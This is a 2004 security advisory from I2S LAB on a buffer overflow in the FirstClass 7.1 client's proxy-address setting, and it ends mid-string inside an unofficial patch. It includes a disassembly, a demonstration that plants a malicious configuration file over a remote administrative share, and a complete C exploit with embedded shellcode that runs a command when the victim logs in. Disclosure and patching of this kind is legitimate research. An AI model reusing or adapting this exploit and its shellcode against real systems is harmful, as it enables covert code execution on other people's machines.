########################################################################################### ~ I2S LAB Security Advisory ~ ########################################################################################### http://www.I2S-LAB.com Affected system : Server / Client FirstClass version 7.1 Editor / Vendor : Open Text, http://www.centrinity.com Impact : Malicious code execution Bug discovery : October 30, 2003 Risk analyze : December 10, 2003 Patch development by I2S-LaB : December 16, 2003 Editor prevention : March 15, 2004 Editeur response : March 30, 2004 Official publication : April 07, 2004 Description ___________ FirstClass is a complete network service software and is an attractive alternative to Microsoft Exchange or Lotus Notes. In order to use FirstClass, users must have a client installed on its computer (or other devices such as PDAs...) which is downloadable at the following adress : http://www.centrinity.com/ClientDownloads/ Technicals details __________________ The FirstClass client suffers from a buffer overflow vulnerability, which could allow an attacker to execute code without the user being able to notice as he click on the "LOGIN" button. The problem comes from the "LOCAL NETWORK.FCP" file whose "PROXYADDR" parameter is not correctly analysed by the program. Any person accessing this file, localy or remotely, can force the user to execute a predefined command as he tries to log in. ============================================================================== Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\>type "c:\Program Files\FirstClass\fcp\Local Network.FCP" PROXYPORT = 1080 PROXYADDR = "AAAAAAAAAAAAAAAABBBB" CONNTYPE = 8 FCPENCRYPT = 1 DLSEND = 0 DLERRS = 0 DLRCV = 0 MDMDBG = 0 SLDBG = 0 TCPTXWIN = 10000 TCPRXBUF = 10000 TCPREMPORT = 510 C:\>c:\Program Files\FirstClass\Fcc32.exe ============================================================================= This exception may be expected and handled. eax=00000000 ebx=00000093 ecx=fffffffd edx=00000003 esi=00000075 edi=00c3c3f0 eip=42424242 esp=0012f720 ebp=41414141 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010212 42424242 ?? ??? 0:000> dd esp 0012f720 00c4a600 00c4a5d0 00000000 0012f798 0012f730 0054dae9 0012f8d8 00000000 00000280 0012f740 00c4a5d0 78478191 78469640 ffffffff 0012f750 00000004 022d6538 00c20000 0066024c 0012f760 00c4a5d0 00c4a5d0 022dc858 0012f77c 0012f770 0056ca34 022dc858 00000000 0012f78c 0012f780 00550a4f 022dc858 00000001 0012f8f8 0012f790 006229fd ffffffff 0012f7b4 0056c5e8 EIP = 42424242, which means that the program estimates that PROXYADDR can only contain a maximum of 16 caracters, that is an IP adress xxx.xxx.xxx.xxx Here is the vumnerable function : ============================================================================== 00401000 ; File Name : C:\Program Files\FirstClass\Fcc32.exe 00401000 ; Format : Portable executable for IBM PC (PE) 00401000 ; Section 1. (virtual address 00001000) 00401000 ; Virtual size : 00224175 (2244981.) 00401000 ; Section size in file : 00225000 (2248704.) 00401000 ; Offset to raw data for section: 00001000 00401000 ; Flags 60000020: Text Executable Readable 00401000 ; Alignment : 16 bytes ? 00401000 ; OS type : MS Windows 00401000 ; Application type: Executable 32bit 00401000 00401000 00401000 model flat 00401000 00401000 ; --------------------------------------------------------------------------- 005620DA ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ 005620DA 005620DA 005620DA ; long __cdecl FCPProxyIPLong(unsigned char *) 005620DA ; Attributes: bp-based frame 005620DA 005620DA public ?FCPProxyIPLong@@YAJPAE@Z 005620DA ?FCPProxyIPLong@@YAJPAE@Z proc near ; CODE XREF: CSerWTCP::Init(tCfgRec *,int)+22Ap 005620DA push ebp 005620DB mov ebp, esp 005620DD sub esp, 50h 005620E0 mov eax, [ebp+8] 005620E3 push eax 005620E4 lea ecx, [ebp-50h] 005620E7 push ecx 005620E8 call ?pstrcpy@@YAXPAEPBE@Z ; pstrcpy(uchar *,uchar const *) 005620ED add esp, 8 005620F0 push offset $SG29826_0 ; "\t.0.0.0.0." 005620F5 lea edx, [ebp-50h] 005620F8 push edx 005620F9 call ?pstrcat@@YAXPAEPBE@Z ; pstrcat(uchar *,uchar const *) 005620FE add esp, 8 00562101 lea eax, [ebp-50h] 00562104 push eax 00562105 call ?PtoCstr@@YAPADPAE@Z ; PtoCstr(uchar *) 0056210A add esp, 4 0056210D push offset $SG29828 ; "." 00562112 lea ecx, [ebp-50h] 00562115 push ecx 00562116 call _strtok 0056211B add esp, 8 0056211E push eax 0056211F lea edx, [ebp-0Ch] 00562122 push edx 00562123 call _strcpy 00562128 add esp, 8 0056212B lea eax, [ebp-0Ch] 0056212E push eax 0056212F call _atoi 00562134 add esp, 4 00562137 mov [ebp-10h], al 0056213A push 1 0056213C lea ecx, [ebp-10h] 0056213F push ecx 00562140 lea edx, [ebp-4] 00562143 push edx 00562144 call _memcpy 00562149 add esp, 0Ch 0056214C push offset $SG29831 ; "." 00562151 push 0 00562153 call _strtok 00562158 add esp, 8 0056215B push eax 0056215C lea eax, [ebp-0Ch] 0056215F push eax 00562160 call _strcpy 00562165 add esp, 8 00562168 lea ecx, [ebp-0Ch] 0056216B push ecx 0056216C call _atoi 00562171 add esp, 4 00562174 mov [ebp-10h], al 00562177 push 1 00562179 lea edx, [ebp-10h] 0056217C push edx 0056217D lea eax, [ebp-3] 00562180 push eax 00562181 call _memcpy 00562186 add esp, 0Ch 00562189 push offset $SG29834 ; "." 0056218E push 0 00562190 call _strtok 00562195 add esp, 8 00562198 push eax 00562199 lea ecx, [ebp-0Ch] 0056219C push ecx 0056219D call _strcpy 005621A2 add esp, 8 005621A5 lea edx, [ebp-0Ch] 005621A8 push edx 005621A9 call _atoi 005621AE add esp, 4 005621B1 mov [ebp-10h], al 005621B4 push 1 005621B6 lea eax, [ebp-10h] 005621B9 push eax 005621BA lea ecx, [ebp-2] 005621BD push ecx 005621BE call _memcpy 005621C3 add esp, 0Ch 005621C6 push offset $SG29837 ; "." 005621CB push 0 005621CD call _strtok 005621D2 add esp, 8 005621D5 push eax 005621D6 lea edx, [ebp-0Ch] 005621D9 push edx 005621DA call _strcpy 005621DF add esp, 8 005621E2 lea eax, [ebp-0Ch] 005621E5 push eax 005621E6 call _atoi 005621EB add esp, 4 005621EE mov [ebp-10h], al 005621F1 push 1 005621F3 lea ecx, [ebp-10h] 005621F6 push ecx 005621F7 lea edx, [ebp-1] 005621FA push edx 005621FB call _memcpy 00562200 add esp, 0Ch 00562203 mov eax, [ebp-4] 00562206 mov esp, ebp 00562208 pop ebp 00562209 retn 00562209 ?FCPProxyIPLong@@YAJPAE@Z endp 00562209 00562209 ; --------------------------------------------------------------------------- This function is a proprietary function from FirstClass that equals to inet_addr() from the winsock library. /* * unsigned long inet_addr ( const char FAR * cp ); */ The following is an approxiamtion of this function in C language : ########################################################################################### ******************************************************************************************* long __cdecl FCPProxyIPLong(unsigned char *data) { char temp[16], cIP[3], *p; DWORD dwIpConverted = 0; BYTE sIP = 0; int i = 0; lstrcpy( temp, data ); p = strtok( temp, "." ); while( p && i < 4 ) { lstrcpy( cIP, p ); sIP = atoi( cIP ); memcpy( (BYTE *)&dwIpConverted + i, (BYTE *)&sIP , 1); p = strtok( NULL, "."); i++; } return dwIpConverted; } ******************************************************************************************* ########################################################################################### If you pay attention to the following lines: -> char temp[16]; -> lstrcpy( temp, data ); You will realize this is a classical programmation mistake : if "data" contains more than 16 octets, the strcpy function will write outside of its allowed space, thus erasing data remaining on the pile. demonstration _____________ C:\>net use * \\victim\c "" /user:"administrateur" F: drive is now connected to \\victim\C Command ended successfully. C:\>dir "f:\Program Files\FirstClass\Fcp" Volume in F: drive has no name. Volume serial number is 44DD-C75F Directory of F:\Program Files\FirstClass\Fcp 07/01/2004 16:29 . 07/01/2004 16:29 .. 06/06/2002 10:45 302 Dialup Internet.FCP 09/09/1999 10:36 183 High-Speed Internet.FCP 09/09/1999 10:35 190 Internet.FCP 09/09/1999 10:36 183 Local Network.FCP 4 files(s) 858 octets 2 Dirs) 1 007 112 192 octets libres C:\>type "f:\Program Files\FirstClass\Fcp\Local Network.FCP" PROXYPORT = 1080 PROXYADDR = "0.0.0.0" CONNTYPE = 8 FCPENCRYPT = 1 DLSEND = 0 DLERRS = 0 DLRCV = 0 MDMDBG = 0 SLDBG = 0 TCPTXWIN = 10000 TCPRXBUF = 10000 TCPREMPORT = 510 C:\>d:\code\exploits\FirstClass\FCexploit.exe ############################################### FirstClass Client local buffer overflow Exploit ############################################### Discovered & coded by I2S-LaB. URL : http://www.I2S-LaB.com MAIL : Contact[at]I2S-LaB.com usage : d:\code\exploits\FirstClass\FCexploit.exe /RUN | /RESTORE [path to Local Network.FCP] /RUN : launch the xploit against "Local Network.FCP" /RESTORE : Restore the previous "Local Network.FCP" [path to Local Network.FCP] : Optional, define the path of the "Local Network.FCP" to exploit. Default is C:\Program Files\FirstClass\Fcp\ C:\>d:\code\exploits\FirstClass\FCexploit.exe /run "f:\Program Files\FirstClass\Fcp" ############################################### FirstClass Client local buffer overflow Exploit ############################################### Discovered & coded by I2S-LaB. URL : http://www.I2S-LaB.com MAIL : Contact[at]I2S-LaB.com Saving the Local Network file...ok Opening the Local Network file...ok Writing the Local Network File...ok C:\>dir "f:\Program Files\FirstClass\Fcp" Volume in F: drive has no name. Volume serial number is 44DD-C75F Répertoire de f:\Program Files\FirstClass\Fcp 07/01/2004 16:31 . 07/01/2004 16:31 .. 06/06/2002 10:45 302 Dialup Internet.FCP 09/09/1999 10:36 183 High-Speed Internet.FCP 09/09/1999 10:35 190 Internet.FCP 09/09/1999 10:36 183 Local Network.BAK 07/01/2004 16:31 2 750 Local Network.FCP 5 files(s) 3 608 octets 2 Dir(s) 1 007 108 096 octets libres C:\>type "f:\Program Files\FirstClass\Fcp\Local Network.FCP" CONNTYPE = 8 FCPENCRYPT = 1 DLSEND = 0 DLERRS = 0 DLRCV = 0 MDMDBG = 0 SLDBG = 0 TCPTXWIN = 10000 TCPRXBUF = 10000 TCPREMPORT = 510 PROXYPORT = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAÙGZ3 ïýWRWhExecOü´ ¿ûæWhEL32hKERNì]õS3 ü´XØØ  ?ì]ÝSPfü¸Q?O ?j? u° ðfâ´L ÎÞ¦    calc.exe & " PROXYADDR = "AAAAAAAAAAEEEEDD_u- C:\>net use * /d You own the following remote connections : F: \\victime\c The end of this operation will shut down connections Do you wish to continue this operation ? (Y/N) [N] : y The command ended successfully. C:\> As "victim" logs in FirstClass through the client, the calculator is launched. Exploit _______ /*********************************************************** ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ########################################################### # FirstClass Desktop 7.1 (latest) buffer overflow exploit # ########################################################### Discovered and coded by I2S-LaB. URL : http://www.I2S-LaB.com contact : contact[at]I2S-LaB.com ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Compile it with cl.exe (VC++6) ************************************************************/ #include void main (int argc, char *argv[]) { HANDLE FCP; DWORD NumberOfBytesWritten; unsigned char *p, FC_FILE[] = "Local Network.FCP", PATH[] = "C:\\Program Files\\FirstClass\\Fcp\\", rawData[] = ///////////////////////////////////////////////////////////////// // FC file data ///////////////////////////////////////////////////////////////// "\x43\x4F\x4E\x4E\x54\x59\x50\x45\x20\x3D\x20\x38\x0D\x0A\x46\x43" "\x50\x45\x4E\x43\x52\x59\x50\x54\x20\x3D\x20\x31\x0D\x0A\x44\x4C" "\x53\x45\x4E\x44\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x45\x52\x52\x53" "\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x52\x43\x56\x20\x3D\x20\x30\x0D" "\x0A\x4D\x44\x4D\x44\x42\x47\x20\x3D\x20\x30\x0D\x0A\x53\x4C\x44" "\x42\x47\x20\x3D\x20\x30\x0D\x0A\x54\x43\x50\x54\x58\x57\x49\x4E" "\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52\x58\x42" "\x55\x46\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52" "\x45\x4D\x50\x4F\x52\x54\x20\x3D\x20\x35\x31\x30\x0D\x0A\x50\x52" "\x4F\x58\x59\x50\x4F\x52\x54\x20\x3D\x20\x22" ///////////////////////////////////////////////////////////////// // MASS NOP LIKE : 'A' = inc ecx ///////////////////////////////////////////////////////////////// "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* * Fcclient Specific shellcode [78 bytes] ******************************************************************** :00401006 EB47 jmp 0040104F :00401008 5A pop edx :00401009 33FF xor edi, edi :0040100B 8BEC mov ebp, esp :0040100D 57 push edi :0040100E 52 push edx :0040100F 57 push edi :00401010 6845786563 push 63657845 :00401015 4F dec edi :00401016 81EFFFA89691 sub edi, 9196A8FF :0040101C 57 push edi :0040101D 68454C3332 push 32334C45 :00401022 684B45524E push 4E52454B :00401027 8D5DE4 lea ebx, dword ptr [ebp-1C] :0040102A 53 push ebx :0040102B 33FF xor edi, edi :0040102D 81EF589D9DFF sub edi, FF9D9D58 :00401033 FF17 call dword ptr [edi] :00401035 8D5DED lea ebx, dword ptr [ebp-13] :00401038 53 push ebx :00401039 50 push eax :0040103A 6681F75103 xor di, 0351 :0040103F 4F dec edi :00401040 FF17 call dword ptr [edi] :00401042 6A01 push 00000001 :00401044 FF75F8 push [ebp-08] :00401047 FFD0 call eax :00401049 6683EF4C sub di, 004C :0040104D FFD7 call edi :0040104F E8B4FFFFFF call 00401008 ********************************************************************* * */ "\xEB\x47\x5A\x33\xFF\x8B\xEC\x57\x52\x57\x68\x45\x78\x65\x63\x4F" "\x81\xEF\xFF\xA8\x96\x91\x57\x68\x45\x4C\x33\x32\x68\x4B\x45\x52" "\x4E\x8D\x5D\xE4\x53\x33\xFF\x81\xEF\x58\x9D\x9D\xFF\xFF\x17\x8D" "\x5D\xED\x53\x50\x66\x81\xF7\x51\x03\x4F\xFF\x17\x6A\x01\xFF\x75" "\xF8\xFF\xD0\x66\x83\xEF\x4C\xFF\xD7\xE8\xB4\xFF\xFF\xFF" "calc.exe & " // to execute //////////////////////////////////////////////////////////////// // OTHER DATA //////////////////////////////////////////////////////////////// "\x22\x0A\x0D\x0A\x50\x52\x4F\x58\x59\x41\x44\x44\x52\x20" "\x3D\x20\x22\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x45\x45\x45" "\x45\x44\x44" ///////////////////////////////////////////////////////////////// // Return Address ///////////////////////////////////////////////////////////////// "\x5f\x75\xC2\x00"; // Banner printf ("###############################################\n" "FirstClass Client local buffer overflow Exploit\n" "###############################################\n" "Discovered & coded by I2S-LaB.\n\n" "URL : http://www.I2S-LaB.com\n" "MAIL : Contact[at]I2S-LaB.com\n\n"); if ( !argv[1]) argv[1] = FC_FILE; (argc > 2 ) ? (p = argv[2]) : (p = PATH); if ( !(SetCurrentDirectory( p ) ) ) { printf ("cannot set current directory to %s\nexiting.\n", p); ExitProcess(0); } if (!lstrcmpi (argv[1], "/restore") ) printf ("Restore the backup file...%s\n", CopyFile ("Local Network.BAK", FC_FILE, FALSE) ? "ok" : "Error : backup file not found!\n"); else if ( !lstrcmpi (argv[1], "/run")) { printf ("Saving the Local Network file...%s\n", CopyFile (FC_FILE, "Local Network.BAK", TRUE) ? "ok" : "Backup file cannot be made"); printf ("Opening the Local Network file..."); FCP = CreateFile (FC_FILE, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL); if (FCP == INVALID_HANDLE_VALUE) { printf ("cannot open Local Network file, exiting!\n"); ExitProcess (-1); } printf ("ok\nWriting the Local Network File...%s\n", WriteFile (FCP, rawData, strlen (rawData) + 1, &NumberOfBytesWritten, NULL) ? "ok" : "Write file error!"); } else printf ("usage : %s /RUN | /RESTORE [path to Local Network.FCP]\n\n" "/RUN : launch the xploit against \"Local Network.FCP\"\n" "/RESTORE : Restore the previous \"Local Network.FCP\"\n\n" "[path to Local Network.FCP] : Optional,\ndefine the path of the \"Local Network.FCP\" to exploit.\n" "Default is %s\n", argv[0], PATH); } Solution ________ Until the editor publishes a patch, I2s-Lab offers a NON OFFICIAL correcting the patch available upon request. Please refer to http://www.i2s-lab.com/Research-tools.html to obtain the binary version of the following code. /****************************************************************** =================================================================== Unoffical patch for FirstClass Client 7.1 PROXYADDR buffer overflow =================================================================== Coded by I2S-LaB. Mail : Contact[at]I2S-LaB.com Url : http://www.I2S-LaB.com compilation : cl.exe (VC++6) *******************************************************************/ #include #include #include #include #pragma comment (lib, "version.lib") #define DefaultPATH "C:\\Program Files\\FirstClass\\Fcc32.exe" ////////////////////////////////////////////// // little class ////////////////////////////////////////////// class I2S_ManipFile { public : I2S_ManipFile() { this->File = 0;}; ~I2S_ManipFile() { CloseHandle (this->File); }; BOOL OpenFile (char *file); int Write (DWORD offset, char *buffer, DWORD NumberOfByteToWrite); BOOL ourGetVersion (char *file); VS_FIXEDFILEINFO *FccInfo; private : HANDLE File; DWORD var; char *pVersion; }; ////////////////////////////////////////////// // get version ////////////////////////////////////////////// BOOL I2S_ManipFile::ourGetVersion(char *file) { if ( !(this->var = GetFileVersionInfoSize(file, &this->var)) ) return FALSE; this->pVersion = new char[var]; GetFileVersionInfo(file, 0, this->var, this->pVersion); VerQueryValue(this->pVersion, "\\", (LPVOID *) &this->FccInfo, (PUINT) &this->var); delete this->pVersion; return TRUE; } ////////////////////////////////////////////// // Ouvre le fichier à patcher ////////////////////////////////////////////// BOOL I2S_ManipFile::OpenFile(char *file) { this->File = CreateFile (file, GENERIC_READ + GENERIC_WRITE, FILE_SHARE_READ + FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (this->File == INVALID_HANDLE_VALUE) return FALSE; else return TRUE; } ////////////////////////////////////////////// // Ecrit des données dans le fichier ////////////////////////////////////////////// int I2S_ManipFile::Write(DWORD offset, char *buffer, DWORD NumberOfByteToWrite) { DWORD NumberOfByteWritten; if (!this->File) return -1; SetFilePointer (this->File, offset, NULL, FILE_BEGIN); WriteFile (this->File, buffer, NumberOfByteToWrite, &NumberOfByteWritten, NULL); return NumberOfByteWritten; } ////////////////////////////////////////////// // MAIN ////////////////////////////////////////////// void main (int argc, char *argv[]) { char *PATH; int i; I2S_ManipFile FirstClass; struct _info { int offset; char *buffer; int NumberOfByte; } Info[5] = { {0x162209, "\xE8\x72\x2F\x0C\x00\xC3", 6}, // Call 00625180 {0x225180, "\x81\x7C\x24\x04\xB3\xBC\x54\x00" // cmp dword ptr [esp+04], 0054BCB3 "\x75\x01" // jne 0062518B "\xC3" // ret "\x6A\x00" // push 00000000 "\x68\x00\x53\x62\x00" // push 00625300 "\x68\x20\x53\x62\x00" // push 00625320 "\x6A\x00" // push 00000000 "\xFF\x15\xB8\x66\x62\x00" // Call MessageBoxA "\xFF\x15\xAC\x61\x62\x00", 37}, // Call ExitProcess {0x225300, "I2S-LaB Warning !", 17}, {0x225320, "A buffer overflow attempt has been blocked. " "Please, download the latest version of your FirstClass " "client at http://www.centrinity.com to fix this problem.\x0d\x0a\x0d\x0a" "for further technicals details, take a look at our security advisory : " "http://www.I2S-LaB.com", 252}, {0,NULL,0}, }; printf ("##############################################\n" "FirstClass Client version 7.1 Unofficial patch\n" "##############################################\n" "By I2S-LaB\n" "----------------------\n" "http://www.I2S-LaB.com\n" "Contact[at]I2S-LaB.com\n" "----------------------\n\n"); if (!argv[1]) { PATH = DefaultPATH; printf ("usage : I2S-FC_fix.exe [Path\\to\\Fcc32.exe]\n\n"); } else PATH = argv[1]; printf ("Do you realy want to patch %s ? [Y/N] : ", PATH); if (getch () != 'y') { printf ("\nexiting !\n"); ExitProcess(1); } printf ("\nRetrive version of Fcc32.exe : "); if (FirstClass.ourGetVersion(PATH) && FirstClass.FccInfo->dwFileVersionMS == 458753 && FirstClass.FccInfo->dwFileVersionLS == 0) printf ("Good version\n"); else { printf ("Bad version !\nExiting...\n"); ExitProcess(0); } printf ("\n\nopening %s...", PATH); if (!FirstClass.OpenFile(PATH)) { printf ("Error 